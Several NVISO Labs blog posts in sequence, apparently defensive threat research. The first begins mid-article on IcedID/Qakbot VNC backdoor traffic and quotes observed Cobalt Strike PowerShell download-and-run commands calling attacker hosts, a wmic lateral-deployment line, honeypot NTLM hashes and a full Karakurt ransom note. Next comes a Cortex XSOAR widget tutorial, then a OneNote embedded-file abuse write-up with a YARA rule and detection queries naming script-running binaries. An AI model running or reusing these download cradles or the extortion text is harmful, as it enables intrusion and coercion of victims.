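    while i + 8 <= len(stream):
        # ClientCutText: 1 byte type (6), 3 padding bytes, 4-byte big-endian length, Latin-1 text
        if stream[i] == 6 and stream[i + 1:i + 4] == b"\x00\x00\x00":
            (length,) = struct.unpack(">I", stream[i + 4:i + 8])
            # Arbitrary sanity bound to reduce false positives from unrelated bytes
            if 0 < length <= 1_000_000 and i + 8 + length <= len(stream):
                texts.append(stream[i + 8:i + 8 + length].decode("latin-1", errors="replace"))
                i += 8 + length
                continue
        i += 1
    return texts

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        for text in extract_clientcuttext(f.read()):
            print(repr(text))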

Cobalt Strike

As expected, many variations of Cobalt Strike downloaders were observed. These leveraged both IPs and domain names, as well as standard and non-standard ports such as HTTP on port 443 or HTTPS on port 8080.

IEX ((new-object net.webclient).downloadstring('http://89.163.251.143:80/a'))
IEX ((new-object net.webclient).downloadstring('http://146.0.72.85:443/waw')) 
IEX ((new-object net.webclient).downloadstring('https://searcher.host/a80lvl'))
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))"

In some cases, the operators directly leveraged PowerShell shellcode stagers as shown in the following trimmed command.

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPA...AGQAKAApADsA

For compromised accounts with sufficient access, WMIC commands were further issued to deploy Cobalt Strike on remote appliances.

C:\Windows\System32\wbem\wmic.exe /node:10.6.21.140 process call create "cmd.exe /c powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://solvesalesoft.com:8080/coin'))"""

Finally, although we were unable to identify which tooling would rely on such a format, actors leaked what appears to be a naming convention.

plugin_cobalt_126_8888
plugin_cobalt_126_8080
plugin_cobalt_126_443

Rundll32

Besides Cobalt Strike, operators exposed a DllRegisterServer command which Unit 42 observed being used with rundll32.exe and attributed to the deployment of a VNC backdoor.

DllRegisterServer --id %id% --group %group% --ip 87.120.8.190,158.69.133.70,185.106.120.99,45.14.226.195,103.124.106.154,149.3.170.201,5.181.80.103,89.41.182.242,172.83.155.186,45.42.201.179,194.15.112.223

NTLM Hashes

Another interesting finding was the presence of NTLM hashes within the clipboard data, exposing the compromise’s scope. In this case, the impacted organization was part of a honeypot environment.

DESKTOP-4GDQQL7\admin 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\Administrator 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\bennie.mcbride 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\brenda.richardson 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY\daryl.wood 4081e42481a5986e9bfcb7000bbe98f4
TECHHIGHWAY-DC\saul.underwood 4081e42481a5986e9bfcb7000bbe98f4
DESKTOP-4GDQQL7\WDAGUtilityAccount 7cd5fddee0cd00dde47014fe7f52faa4
TECHHIGHWAY-DC\krbtgt a7b565c147b69380d0b35f37ce478a1c

Attacker Notes

While the above findings do not aid attribution, one operator did leak their intrusion notes. Within these notes (“[...]” trimmed for readability) we can observe Russian annotations, commonly related to CIS-based crime groups, as well as information on then-ongoing breaches. A couple of days after the network traffic was captured, two non-honeypot companies mentioned within these notes were listed on the Black Basta ransomware group’s leak site.

[...]
Hostname CTYMNGR1 =ist  ne v domene
Hostname PCCXCNAU001 (4)-no ad/da/error 
Hostname W10EQZAFI10027 -?ff ne prishla
Hostname NPD104 -24 host (7)
Hostname DESKTOP-3R921OV -small
[...]
Hostname CAS-TAB0010 [...] 28m 9prosto) yshla v off/sdelal zakrep MSNDevices? 
Hostname PC-REC-LEFT-10 --???? ? ?? ????
Hostname TRAINING - w craneserviceco.com 20m (???) razobral
[...]
Hostname RM6988 msystemscompany.com 32m (??????) ?????????? ? ???? ?? ?????????? ???????? + ???????? ??????? 
Hostname EXIRP316151 ?????? ?? ????? ???????
Hostname ADMIN201 ???? ? ???
[...]
Hostname ODSCHEDULING  [...] 12m work7---yshla v off
Hostname MDC1104 [...] 11m istok razobral

Ransom Notes

Another recovered artifact was a full ransom note where authors identified themselves as belonging to the Karakurt Team. While this note did not allow for the identification of its victim, it is further evidence of IcedID and Qakbot’s role within the access broker ecosystem.

Ok, you are reading this - so it means that we have your attention.
Here's the deal :
1. We breached your internal network and took control over all of your systems.
2. We analyzed and located each piece of more-or-less important files while spending weeks inside.
3. We exfiltrated anything we wanted (the total size of taken data exceeds 372 GB).

FAQ:
- Who the hell are you?
- The Karakurt Team. Pretty skilled hackers I guess.

- WHY ARE YOU DOING THIS?!??
- Our motivation is purely financial.

- We are going to report this to law enforcement.
- You surely can, but be ready that they will confiscate most of your IT infrastructure, and even if you will later change your mind and decide to pay - they will not let you.

- Who else already knows about the breach?
- Only You, who received the same message the same way. Nobody else. For now.

- What if I tell you that I do not care and going to ignore this incident.
- That's a very bad choice. If you will not contact us in a timely manner (by 07.01.2022) we will start notifying your employees, clients, partners, subcontractors and any other persons that should know how you treat your own corporate secrets and theirs.

- What if I will not contact you even after it?
- Than we shall move forward and start contacting your business competitors and list of anonymous inside traders we deal with, to find out if they are going to pay us for your data. When the list of the people who is interested in such data is formed - the closed online auction starts.

- None will buy what you took! I do not believe you!
- If the auction fails - we will just leak everything online, making sure that this leak goes straight to the press. We will make sure that your business will bleed by using any power we have in our posession, both social and technical.

- What happens if I pay?
- Nothing bad will happen.
We will remove everything we took from your network and leave you be.
We will provide the confirmation that the data is deleted.
We will help you to close technical vulnerabilities you have and provide some insight on how to avoid such incidents if some other perpetrator is interested in you.
We will never tell anybody about it.

- We understand. We are ready to move forward.
- You will find the Access Code at the end of this file, you will need this one to get in contact with us for further instructions

To contact us using this ID you should do the following :
1. Download Tor browser - https://www.torproject.org and install it.
2. Open link in TOR browser - https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion
3. Insert Access Code 70fdca335aa3fd45a182f39b2592a5d0 inside the field on the page and click Enter.
4. The chat window will open and we will be able to communicate through a secured channel.

This link is available via "Tor Browser" only!


As a gesture of goodwill, we are ready to give you another leak - it is exclusive and fresh as well. Just let us know if you are interested in cooperation.

Key Takeaways

While it may not be complex to detect IcedID or Qakbot itself (any modern EDR should detect the rundll32.exe abuse), distinguishing which interactive actions were taken through a VNC backdoor does pose challenges. Focus is often put on command-based executions without considering what could otherwise be considered legitimate user processes such as web browsers or Outlook. Understanding how these backdoors operate improves response and forensic capabilities by, for example, allowing the identification and explanation of Edge processes with unlikely or unsupported flags.

This blog post further outlined the value of network-level visibility which, for complex or BYOD (Bring Your Own Device) environments, can compensate for a lack of endpoint visibility. In this spirit, we would like to highlight the effectiveness of the Snort IDS rules published by Networkforensic with regard to the detection of IcedID command & control communications.

If you are facing challenges keeping your environment clean or need help due to a compromise, do not hesitate to reach out; NVISO can help!

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified researcher within NVISO Labs. He spends most of his time performing defensive research and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – number widgets

28 February 2023 at 08:00
Cortex XSOAR TipsTricks – Leveraging dynamic sections

Introduction

Cortex XSOAR is a security-oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC is data visualization: analysts can be swarmed with information, and finding out which piece of data is currently both relevant and significant can become hard. One of our tasks as SOAR engineers is to ease the decision process for analysts. We do so by providing additional contextual information about the incidents they handle, directly within the incident layout. With this objective in mind, we incorporate number widgets into the analyst interface; these allow us to tell more visual stories about the security incidents we manage in XSOAR. From raw and sometimes unorganized data, they let us build eye-catching depictions of elements that help in assessing the impact and veracity of a detection.

Objectives

In this blogpost, we will focus on the use of number widgets.

We will show you how to make use of them to output information to the war room, incidents, indicators and dashboards. On top of that, we will also cover how to add trend information and even how to integrate them into a dashboard with a dynamic query. In the previous post in the series, we looked at dynamic sections in Cortex XSOAR and how to leverage them to display text in a tree-like way. If you are not familiar with Cortex XSOAR and dynamic sections, please read that post first.

We previously saw that we could use dynamic sections to display text, but there are a few other options available to us. These options are broken down here. In this post, we will:

  • Start with a simple example that runs a static query against Microsoft Sentinel and lets us display a single number widget.
  • Continue with extracting a second number from our query to populate the trend of the number we display.
  • Bring our widget to a dashboard
  • Make our dashboard widget read the date range selected by the user and modify the Sentinel query accordingly.

Let’s begin with a new automation and follow the instructions available in the number widget example of the PaloAlto documentation. When we run their example, we get the following result:

Figure 1: War Room output of the code example available in the Cortext XSOAR documentation

As expected, the example works out of the box. Let’s now go and make the widget display data from Microsoft Sentinel.

A static number from sentinel

To display data pulled from Microsoft Sentinel (Microsoft Azure’s cloud native SIEM), we first need to call an integration command. Here we use an instance of the Azure Log Analytics integration available in the Cortex XSOAR marketplace:

res = demisto.executeCommand(
	"azure-log-analytics-execute-query", {
		"query": THE_QUERY
	}
)

We need a query to run; we will develop it in Sentinel before using it from Cortex XSOAR.

We will be looking at entries in SecurityIncident, a table that holds information about the security incidents present in your Sentinel deployment. We will query that table, and count the number of distinct incidents in a given month. The query we will use for that is the following:

SecurityIncident
| where TimeGenerated between (
    datetime("2022-10-01T00:00:00+00:00")
    ..
    datetime("2022-11-01T00:00:00+00:00"))
| summarize count()
Figure 2: Screenshot of a Microsoft Sentinel query and it’s results: single value

Now that we know our query works, we will port it to Cortex XSOAR. We start by duplicating our previous automation and adding code to call the integration with the Sentinel query.

res = demisto.executeCommand("azure-log-analytics-execute-query", {
"query": """SecurityIncident
| where TimeGenerated between(
	datetime("2022-10-01T00:00:00+00:00")
	..
	datetime("2022-11-01T00:00:00+00:00"))
| summarize count()"""
})

We need to extract the count_ value we observed in the Sentinel results; let’s inspect the res object returned to us by the integration.

Figure 3: Debug view in PyCharm

Upon inspection of the returned object, we identify that we can use the following logic to extract the count of incidents

counts = []

for result in res:
    if not (
        isinstance(result, dict)
        and
        isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if (
            isinstance(content, dict)
            and
            isinstance(count := content.get("count_"), int)
        ):
            counts.append(count)

total_count = sum(counts)

With the total_count obtained, we can simply change the hardcoded number from our previous widget and replace it with the value we just fetched:

demisto.results(
    {
        "Type": 17,
        "ContentsFormat": "number",
        "Contents": {
            "stats": total_count,
            "params": {
                "name": "Incidents Last Month",
                "colors": {
                    "items": {
                        "green": {
                            "value": 40
                        }
                    }
                }
            }
        }
    }
)

In the snippet above we use demisto.results(); this function lets us write to the standard output that will be read by Cortex XSOAR. More possibilities for returning data from an automation are available in this documentation page: Python code conventions, returning data. Here we use type 17 in the data we return; this is the type associated with widgets, and the list of all defined types is available here.

Upon running our new automation, we get the exact same number previously obtained through Sentinel:

Figure 4: War room view of the widget outputted by the “Single value from Sentinel” code snippet

Adding a trend

We already have the number of incidents from last month pulled into XSOAR and displayed as a widget; let’s continue and also pull the count for the previous month. Our query to Sentinel now becomes:

SecurityIncident
| where TimeGenerated between (
    datetime("2022-10-01T00:00:00+00:00")..
    datetime("2022-11-01T00:00:00+00:00"))
| extend same = 1
| union (
    SecurityIncident
    | where TimeGenerated between (
        datetime("2022-09-01T00:00:00+00:00")..
        datetime("2022-10-01T00:00:00+00:00"))
    | extend same = 2)
| summarize count() by same
Figure 5: Screenshot of a Microsoft Sentinel query and it’s results: two values

Correspondingly, our querying and extracting code becomes:

this_month_counts = list()
last_month_counts = list()

lookup = {
    1: this_month_counts,
    2: last_month_counts
}

for result in res:
    if not (
        isinstance(result, dict)
        and
        isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if not isinstance(content, dict):
            continue
        if not isinstance(raw_same_target := content.get("same"), int):
            continue
        same_target = lookup.get(raw_same_target)
        if (
            same_target is not None
            and
            isinstance(count := content.get("count_"), int)
        ):
            same_target.append(count)

total_this_month_counts = sum(this_month_counts)
total_last_month_counts = sum(last_month_counts)

As for the data returned to Cortex XSOAR, the only change is on the stats key which now becomes:

"stats": {
	"prevSum": total_last_month_counts,
	"currSum": total_this_month_counts
}

The resulting widget looks as follows:

Figure 6: War room view of the widget outputted by the “Dual values from Sentinel” code snippet

Moving to incidents and indicators

Until now, we have been displaying our widgets in the war room; however, we can also add them to incident and indicator layouts. As a reminder, the procedure to add General Purpose Dynamic sections to an incident can be found here: Add a Script to the incident Layout.

Our existing widgets are already compatible with incidents and indicators. After following the instructions above on how to add widgets to incidents, we get the following layout tab. In a similar fashion, after adding the dynamic-indicator-section tag to all three automations, you can also add them as widgets to an indicator layout:

Figure 7: Incident VS Indicator view of the three widgets

Moving to a dashboard

Rendering widgets in a dashboard is actually easier than in an incident layout. To verify this, let’s compare the methods for outputting a simple number widget, both for an incident and for a dashboard. For an incident, as we saw earlier, you need to return the actual number, but it needs to be wrapped appropriately:

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": 53,
        "params": {
            "layout": "horizontal",
            "name": "Lala",
            "sign": "@",
            "colors": {
                "items": {
                    "#00CD33": {
                        "value": 10
                    },
                    "#FAC100": {
                        "value": 20
                    },
                    "green": {
                        "value": 40
                    }
                }
            },
            "type": "above"
        }
    }
}

demisto.results(data)

In contrast, it is much easier for a dashboard:

result = 10
demisto.results(result)

The difference here is that when building a dashboard, you can access the widget builder:

Figure 8: Dashboard widget editor view

Whereas from an incident, you need to explicitly return metadata defining the look and feel of your widget.

Therefore, if we want to make it possible for our automations to be used from a dashboard too, we need to adapt them to return either a simple value if being called from a dashboard, or a wrapped value if called from an incident or indicator.

Our first addition to the existing scripts will be to identify whether we're being called from a dashboard; we will use the following snippet for this purpose.

is_dashboard = demisto.args().get("widgetType") is not None

This works because dashboards that have automation-based widgets add a special argument when calling these automations. This special argument mentions the expected results type and can be found under the key widgetType; its presence is a good indication that your automation has been called from a dashboard.
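
To make this concrete, the arguments received by an automation-based widget on a dashboard could look roughly like the following; the values are illustrative, and widgetType reflects the expected result type (here a number widget):

args = {
    "widgetType": "number",   # added by the dashboard, absent in incident/indicator layouts
    "from": "2022-10-01T00:00:00Z",
    "to": "2022-11-01T00:00:00Z"
}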

We can now differentiate our outputted results depending on whether or not we are in a dashboard. For that, we split our incident/indicator results in two: the actual data and the wrapper. This snippet shows the approach applied to our first automation:

number = 53

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
      "stats": number,
......
if is_dashboard:
    demisto.results(number)
else:
    demisto.results(data)

We do this with our three automations and also add the widget tag to them to make them selectable as a source for automation-based dashboard widgets. Once added to a dashboard, our widgets look as follows:

Figure 9: Dashboard view of the three widgets

Getting timeframe data from the dashboard

At this point we are powering our widgets with data from Sentinel, but we are always looking at data from the same timeframe. Because dashboards have a time picker, we can instead start to use that data to determine the timeframe we are querying Sentinel for. Extraction of timeframe data from dashboards was covered in this previous blogpost.

We start by adding this line to our automation:

FromDate, ToDate = (
    NitroDateFactory
    .from_regular_xsoar_date_range_args(
        demisto.args()
    )
)

This gives us two NitroDates we can use to craft our Sentinel queries. In our second script which queries a single timeframe, the code becomes:

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{from_}")')

if to_ is not None:
    tmp_query_list.append(f'TimeGenerated < datetime("{to_}")')

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| summarize count() by same"""

The logic we are modifying is the one describing how we craft our Kusto query (the query language used in Microsoft Sentinel). We previously always had at our disposal a from_ and a to_ string representing the beginning and end of the timeframe we were interested in. With the dashboard date range selector, this is not the case anymore: we may get only a start date if the selector is on “3 days ago to now”, or only an end date if the selector is on “up to 3 days ago”. We must then change the logic we use to craft our query in a way that reflects this change. To accommodate this, we replace the between statement with >= and < statements used to compare the TimeGenerated of an incident to the dates transmitted by the dashboard.

In a similar fashion, we modify the 3rd automation to calculate both the initial timeframe and the previous timeframe from the dates passed down by the dashboard.

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

from_2 = "2022-09-01T00:00:00+00:00"
to_2 = "2022-10-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        if isinstance(ToDate, NitroRegularDate):
            td = ToDate.date
        else:
            td = datetime.now(timezone.utc)
        delta = td - FromDate.date
        from2 = NitroRegularDate(date=FromDate.date - delta)
        to2 = FromDate
    else:
        from2 = FromDate
        to2 = ToDate

    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None
    if isinstance(from2, NitroRegularDate):
        from_2 = from2.to_iso8601()
    else:
        from_2 = None
    if isinstance(to2, NitroRegularDate):
        to_2 = to2.to_iso8601()
    else:
        to_2 = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f"TimeGenerated >= datetime(\"{from_}\")")

if to_ is not None:
    tmp_query_list.append(f"TimeGenerated < datetime(\"{to_}\")")

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| union (
SecurityIncident"""

tmp_query_list2 = list()

if from_2 is not None:
    tmp_query_list2.append(f"TimeGenerated >= datetime(\"{from_2}\")")

if to_2 is not None:
    tmp_query_list2.append(f"TimeGenerated < datetime(\"{to_2}\")")

if tmp_query_list2:
    query += "\n| where " + " and ".join(tmp_query_list2)

query += """
| extend same = 2)
| summarize count() by same"""

Our dashboard is now fully dynamic, with two widgets presenting data corresponding to the selected timeframe:

Figure 10: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Today”
Figure 11: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Last 7 days”

Looking back

We have covered the use of number widgets throughout Cortex XSOAR in pretty much every scenario, and have managed to make use of all the inputs available to us. Although the process used in this post was centered around number widgets, it should be noted that it can be applied to all other types of widgets.

References

Cortex XSOAR documentation: script based widget examples

Cortex XSOAR documentation: script based widget example 2

Microsoft Azure: Sentinel

Cortex XSOAR marketplace: Azure Log Analytics Integration

Cortex XSOAR documentation: Python code conventions

GitHub: Cortex XSOAR source – EntryTypes

Cortex XSOAR documentation: adding a script to an incident layout

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

OneNote Embedded file abuse

27 February 2023 at 08:00

OneNote in the media

In recent weeks OneNote has gotten a lot of media attention as threat actors are abusing the embedded files feature in OneNote in their phishing campaigns.
I first observed this OneNote abuse in the media via Didier’s post. This was later also mentioned in Xavier’s ISC diary and on the podcast. Later, at the beginning of February, The Hacker News covered this as well.

Attack technique

The OneNote feature that is being abused during these phishing campaigns is the ability to hide embedded files behind pictures, which entices the user to click the picture. If the picture is clicked, the file hidden beneath it is executed. These files could be executables, JavaScript files, HTML files, PowerShell scripts, …: basically any type of file that can run malicious code when executed. Recently, we have also observed the usage of .chm files which have an embedded index.html file that runs inline JavaScript.
On a Windows system this roughly translates to either one of the following processes executing the script/file: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'.

An image of a malicious embedded OneNote file

Anatomy of a OneNote file

Didier did amazing work in his blogpost where he described what a OneNote file looks like. What is interesting to us is that OneNote files work with GUIDs to indicate the start of the embedded file section. The GUID that represents the start of an embedded file in OneNote is: {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} Using the following tool we can convert the GUID to a HEX string: e716e3bd65261145a4c48d4d0b7a9eac.
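
The same conversion can also be reproduced in Python, since the on-disk form is simply the little-endian (bytes_le) representation of the GUID:

import uuid

guid = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}")
print(guid.bytes_le.hex())  # e716e3bd65261145a4c48d4d0b7a9eac
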
If a HEX editor is used, you can search for this string and find the exact location of the embedded file.
OneNote will then reserve 20 bytes. The first 8 bytes are used to indicate the length of the file, the following 4 bytes are unused and have to be zero, and the last 8 bytes are reserved and must also be zero. This results in the following HEX string E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 before the embedded file data begins.
When looking at the OneNote file through a HEX editor, it quickly becomes clear that OneNote does not attempt to encrypt or compress anything. That is, if you are looking at a .one file, not a .onepkg. A .onepkg file acts similarly to a ZIP file that contains the exported files from a OneNote notebook. It is possible to open these files using 7zip.
The OneNote file (.one) will display the contents of the embedded file as follows:

A OneNote file in a HEX editor, that shows a plaintext embedded file
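
Because nothing is encrypted or compressed, a few lines of Python are enough to locate the embedded files and peek at their magic bytes. The sketch below is a rough illustration, assuming the 8-byte length field is little-endian and using doc.one as a placeholder filename:

# Rough sketch: locate embedded files in a .one file and check their magic bytes
EMBEDDED_FILE_GUID = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
IMAGE_MAGICS = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"BM", b"GIF8")  # PNG, JPG, BMP, GIF

data = open("doc.one", "rb").read()  # placeholder filename

offset = data.find(EMBEDDED_FILE_GUID)
while offset != -1:
    # 20 reserved bytes follow the 16-byte GUID: 8 bytes of length, 12 bytes of zeroes
    length = int.from_bytes(data[offset + 16:offset + 24], "little")  # assumed little-endian
    content = data[offset + 36:offset + 36 + length]
    print(f"embedded file at offset {offset}: {length} bytes, image: {content.startswith(IMAGE_MAGICS)}")
    offset = data.find(EMBEDDED_FILE_GUID, offset + 1)
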

This means that we can easily check for known false positives while analyzing these files, which brings me to the next point, creating a detection rule.

YARA Rule

It is not easy to create a detection rule that catches all malicious embedded files, as scripts usually do not have a “magic byte”, unlike executables which have the famous “MZ” header. While it would be easy to create a YARA rule that looks for the previously observed hex string followed by the MZ file header, this would only flag embedded executables. If that is your goal then it is a great rule; however, I would like something more flexible that I can use on an email gateway to flag all potentially malicious incoming OneNote files.
So I took a different approach. I observed that it is common for pictures (e.g. screenshots) to be embedded in a OneNote file. I did not observe many cases that had other files embedded. This led me to create a YARA rule that looks at a OneNote file, ignores the file sections that indicate that an image is present, but raises an alert when any other file type is observed. So instead of looking for malicious files, I ignore known legitimate files. This simple trick allowed me to create a high-confidence detection rule while not overloading analysts with too many false positives.
Of course every environment is different and if it is common for PDF files to be embedded in OneNote files in your environment, you should exclude those PDF files as well. Therefore, it is important to establish a baseline during a testing period.
Below is an example of this technique. The 00s after the ?? can also be replaced with ??: although these bytes should always be empty, the rule as written will not detect files in which they were altered.

rule OneNote_EmbeddedFiles_NoPictures
{
    meta:
        author = "Nicholas Dhaeyer - @DhaeyerWolf"
        date_created = "2023-02-14 - <3"
        date_last_modified = "2023-02-17"
        description = "OneNote files that contain embedded files that are not pictures."
        reference = "https://blog.didierstevens.com/2023/01/22/analyzing-malicious-onenote-documents/"

    strings:
        $EmbeddedFileGUID =  { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC }
        $PNG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4E 47 0D 0A 1A 0A }
        $JPG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF D8 FF }
        $JPG20001 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 6A 50 20 20 0D 0A 87 0A }
        $JPG20002 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF 4F FF 51 }
        $BMP = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 42 4D }
        $GIF = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 47 49 46 }

    condition:
        $EmbeddedFileGUID and (#EmbeddedFileGUID > #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF)
}

The latest version of this rule can be found on my GitHub

The logic behind the rule is as follows: the YARA rule matches any file that contains the GUID indicating that an embedded file is present in the OneNote file. It then counts the number of GUIDs it has found. If this is more than the number of GUIDs which are directly followed by an image file (counted here as #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF), then other files are present and the rule matches. If not, the file only contains images and is assumed to be safe.
After a file is flagged, an analyst should still take a look at the embedded files. DissectMalware created an amazing Python script that helps with the extraction of the embedded files. An analyst or automation system can analyze the file and provide more context on whether the extracted files are malicious or not.

At the time of writing this blogpost, I ran my YARA rule on VirusTotal to see if there were any detections. I only looked back 3 weeks and found more than 4,000 files that matched the rule. One of these is d2e6629f8bbca3663e1d76a06042bc1d459d81572936242c44ccc6cd896bfd5c, which did not have any detections on VirusTotal at the time of writing. When this file is executed (seen in the screenshot below with the filename doc.one), Microsoft detects it as a Qakbot dropper.

MDE blocking a malicious OneNote file infected with Qakbot

One observation that we have made is that a lot of these malicious OneNote files have an embedded file that is inserted from the Z:\builder\ directory. I suspect that this is where the malware builder tool creates the actual malicious file before inserting it into the OneNote file. If this is the case, this path can be used to identify these files and link them to the tool that was used.

I built a quick POC to parse these files, which can be found on my GitHub. Additionally, I created a YARA rule on my GitHub that looks for OneNote files containing these suspicious folder paths.
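
As a rough illustration of that idea, the snippet below simply searches the raw bytes of a OneNote file for the suspicious builder path; the encodings checked are an assumption, and doc.one is again a placeholder filename:

# Rough check for the suspicious builder path (ASCII and UTF-16LE encodings are assumptions)
needles = (b"Z:\\builder\\", "Z:\\builder\\".encode("utf-16-le"))
data = open("doc.one", "rb").read()  # placeholder filename
if any(needle in data for needle in needles):
    print("suspicious Z:\\builder\\ path found")
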

Execution of a script through OneNote

As I was curious what would happen if a script were executed from OneNote, I created a Proof of Concept (POC): a small .bat script that executes the whoami command.

Microsoft MDE process execution of the embedded file

As can be observed above, OneNote, as the parent process, executes cmd.exe /c {OneNoteFilePath}, where {OneNoteFilePath} is the location of a temporary copy of the script, which is then executed.
When looking at File creation events, we also observe that this file is created on disk:

FileCreate event for the path: c:\Users\Hera\AppData\Temp\OneNote\16.0\Exported\{CCA4A94E-126B-489B-8B23-2B2C160D42AC}\NT\0\whoami.bat

As a detection rule, it could prove fruitful to detect OneNote spawning any of the lolbins commonly used for script execution such as the previously mentioned ones: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'. Additionally, looking for file creation or execution events under the path: C:\Users\Hera\AppData\Local\Temp\OneNote\16.0\Exported may give interesting results.

DeviceProcessEvents
| where ProcessCommandLine matches regex @".*C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"
DeviceFileEvents
| where FolderPath matches regex @"C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"

Observations in production environments

At some point I was confused: I saw all these articles in the media about this new way of delivering malware, yet I had not seen a single infection or flagged email arrive in our SOC. So I did some digging, and it turns out that Microsoft is pretty good at preventing this new way of malware delivery.
So let’s show some statistics:
Over a period of 30 days with one client, we observed 255 emails that contained a OneNote file:

255 observed emails of the FileType: “one;onenote”

48 of these 255 were not flagged by Microsoft as malicious; the other 207 were, meaning that more than 80% of the OneNote attachments were already known to be malicious.

Microsoft detecting malicious emails with the filetype: “one;onenote”

When we look at the actual impact, we can see that of the 207 malicious emails, only one was delivered.

Evidence of one malicious email being delivered

This leads me to conclude that, at this moment, Microsoft is very good at blocking these emails. My hypothesis is that because OneNote embedded files are stored in plain text, and the threat actors apply little obfuscation or defense evasion, they are very easy to catch with traditional ways of scanning files. Once this changes, we might see more impacted cases being reported.

Conclusion

As threat actors are looking for new ways to deliver their malware, we need to be one step ahead to protect our data and users. And while Microsoft has already proven able to detect and block these phishing emails, we need to take into consideration that not everyone runs Microsoft products and that at some point threat actors will find a way to hide their malware better so that it is not as easily detected.
This blog post was meant to take you step by step through the process of creating a YARA detection rule that can help you prevent being compromised by one of these samples. What should be considered when creating a detection rule like this is that you will have to start from a baseline where you know which embedded files are commonly used within your environment. Although this YARA rule can be used in ‘block’ mode, where it will block every email that matches this rule, it is recommended to use this YARA rule in ‘Alert’ mode where an alert for the SOC team is created, and the email is held until analysis of the attachment is done, as this will minimize the impact of possible legitimate files being blocked.
Additionally, my goal with this blog post is to show that you don’t always have to think about flagging files as malicious. You can also do it the other way around: flag files as legitimate, ignore those, and focus your attention on the files that have not been flagged. However, this does require a certain security maturity and more time to go through the flagged files.

About the Author

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Malware analysis, Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

